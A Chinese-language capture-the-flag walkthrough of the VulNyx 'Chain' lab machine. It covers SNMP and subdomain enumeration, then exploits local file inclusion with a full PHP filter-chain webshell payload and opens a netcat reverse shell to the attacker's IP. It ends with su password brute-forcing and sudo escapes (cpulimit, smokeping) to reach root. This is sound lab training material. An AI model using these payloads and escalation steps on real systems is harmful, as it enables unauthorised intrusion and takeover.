# 靶场搭建
下载:Chain
Nat,IP: 192.168.1.161
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
80/tcp open http Apache httpd 2.4.56 ((Debian)) | |
|_http-title: Chain | |
|_http-server-header: Apache/2.4.56 (Debian) | |
MAC Address: 00:0C:29:37:BE:9A (VMware) |
80 端口开局一张图,strings 得到一个 ssh 的私钥,但是没有账号,拿 metasploit 跑无果
┌──(root㉿kali)-[~] | |
└─# nmap -sU 192.168.1.161 --top-ports 100 | |
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-28 04:36 EDT | |
Nmap scan report for 192.168.1.161 | |
Host is up (0.00046s latency). | |
Not shown: 59 closed udp ports (port-unreach), 40 open|filtered udp ports (no-response) | |
PORT STATE SERVICE | |
161/udp open snmp | |
MAC Address: 00:0C:29:37:BE:9A (VMware) |
使用 onesixtyone 枚举一下社区字符串
社区字符串充当了 SNMP 管理系统和被管理设备之间的共享凭据,以确保只有经过身份验证和授权的用户可以访问和管理设备。如果社区字符串泄露或设置不当,可能会导致安全风险,使设备容易受到未经授权的访问和控制。
┌──(root㉿kali)-[~] | |
└─# onesixtyone -c /usr/share/wordlists/seclists/Discovery/SNMP/snmp.txt 192.168.1.161 | |
Scanning 1 hosts, 3219 communities | |
192.168.1.161 [security] Linux chain 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64 |
获取一下 snmp 的信息
┌──(root㉿kali)-[~] | |
└─# snmp-check -v 2c -c security 192.168.1.161 | |
snmp-check v1.9 - SNMP enumerator | |
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org) | |
[+] Try to connect to 192.168.1.161:161 using SNMPv2c and community 'security' | |
[*] System information: | |
Host IP address : 192.168.1.161 | |
Hostname : Chain | |
Description : Linux chain 5.10.0-23-amd64 #1 SMP Debian 5.10.179-1 (2023-05-12) x86_64 | |
Contact : Blue <[email protected]> | |
Location : VulNyx.com | |
Uptime snmp : 00:19:16.57 | |
Uptime system : 00:19:11.60 | |
System date : 2024-5-28 10:46:41.0 | |
[*] Network information: | |
Default TTL : noSuchObject | |
TCP segments received : noSuchObject | |
TCP segments sent : noSuchObject | |
TCP segments retrans : noSuchObject | |
Input datagrams : noSuchObject | |
Delivered datagrams : noSuchObject | |
Output datagrams : noSuchObject | |
[*] File system information: | |
Index : noSuchObject | |
Mount point : noSuchObject | |
Access : noSuchObject | |
Bootable : noSuchObject |
获取到了域名信息,添加到 host 枚举一下子域
┌──(root㉿kali)-[~] | |
└─# gobuster vhost -u chaincorp.nyx -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --append-domain | |
=============================================================== | |
Gobuster v3.6 | |
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) | |
=============================================================== | |
[+] Url: http://chaincorp.nyx | |
[+] Method: GET | |
[+] Threads: 10 | |
[+] Wordlist: /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt | |
[+] User Agent: gobuster/3.6 | |
[+] Timeout: 10s | |
[+] Append Domain: true | |
=============================================================== | |
Starting gobuster in VHOST enumeration mode | |
=============================================================== | |
Found: utils.chaincorp.nyx Status: 200 [Size: 628] | |
Progress: 114441 / 114442 (100.00%) | |
=============================================================== | |
Finished | |
=============================================================== | |
# 或者 | |
┌──(root㉿kali)-[~] | |
└─# wfuzz -t 100 -c --hl=11 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.chaincorp.nyx" "http://chaincorp.nyx" | |
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. | |
******************************************************** | |
* Wfuzz 3.1.0 - The Web Fuzzer * | |
******************************************************** | |
Target: http://chaincorp.nyx/ | |
Total requests: 114441 | |
===================================================================== | |
ID Response Lines Word Chars Payload | |
===================================================================== | |
000009532: 400 10 L 35 W 301 Ch "#www" | |
000010581: 400 10 L 35 W 301 Ch "#mail" | |
000012080: 200 20 L 37 W 628 Ch "utils" |
拿到了子域: utils.chaincorp.nyx
访问一下狠狠地就是文件包含: http://utils.chaincorp.nyx/include.php?in=/etc/passwd
使用 php_filter_chain_generator 生成 php 过滤器的链子,不用文件上传就能拿到 shell
项目:php_filter_chain_generator
┌──(root㉿kali)-[~/Desktop/php_filter_chain_generator-main] | |
└─# python3 php_filter_chain_generator.py --chain '<?php system($_GET["cmd"]); ?>' | |
[+] The following gadget chain will generate the following code : <?php system($_GET["cmd"]); ?> (base64 value: PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+) | |
php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L5.UTF-32|convert.iconv.ISO88594.GB13000|convert.iconv.BIG5.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.iconv.ISO-IR-103.850|convert.iconv.PT154.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.SJIS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.DEC.UTF-16|convert.iconv.ISO8859-9.ISO_6937-2|convert.iconv.UTF16.GB13000|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.CSA_T500-1983.UCS-2BE|convert.iconv.MIK.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.JS.UNICODE|convert.iconv.L4.UCS2|convert.iconv.UCS-2.OSF00030010|convert.iconv.CSIBM1008.UTF32BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.iconv.CP950.UTF16|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp |
末尾跟上 cmd 参数反弹 shell: &cmd=nc%20-c%20/bin/bash%20192.168.1.129%204444
拿到了 shell
# 提权
前面已知文件包含 passwd 已知用户 blue 和 red
使用 suforce 枚举密码: ./suforce.sh -u blue -w probable-v2-top12000.txt
得到密码: skyblue
sudo -u red cpulimit -l 100 -f /bin/bash 拿到 red 的 shell
sudo /usr/sbin/smokeping --man 后回车几下直到 : 出现, !/bin/bash 拿到 root 权限
